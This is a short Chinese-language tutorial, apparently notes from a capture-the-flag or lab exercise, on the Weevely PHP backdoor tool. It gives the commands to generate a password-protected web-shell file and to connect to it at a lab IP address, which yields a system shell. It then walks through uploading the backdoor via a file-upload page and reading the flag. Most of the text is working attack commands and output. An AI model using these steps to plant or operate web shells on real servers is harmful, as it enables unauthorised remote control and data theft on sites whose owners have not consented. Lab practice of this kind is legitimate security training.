Weevely php后门木马上传使用
基本用法
root@kali:~# weevely
[+] weevely 3.2.0
[!] Error: too few arguments
[+] Run terminal to the target
wevely <URL> <password> [cmd]
[+] Load session file
weevely session <path> [cmd]
[+] Generate backdoor agent
weevely generate <password> <path>
生成一个后门木马:
root@kali:~# weevely generate test hello.php
Generated backdoor with password 'test' in 'hello.php' of 1486 byte size.
root@kali:~# find / -name hello.php
/usr/share/weevely/hello.php
连接后门:
root@kali:~# weevely http://192.168.110.129/hello.php test
[+] weevely 3.2.0
[+] Target: winxp-0947be9ad:C:\phpstudy\WWW
[+] Session: /root/.weevely/sessions/192.168.110.129/hello_0.session
[+] Shell: System shell
[+] Browse the filesystem or execute commands starts the connection
[+] to the target. Type :help for more information.
weevely>
Web文件上传模拟测试(Yueda环境)
网站目录文件
/filesharing.php为文件上传网页
使用weevely生成后门,连接密码为test,生成文件hello.php
选择文件上传
连接后门,格式
Weevely.py http文件路径 连接密码
Cat 获取到flag值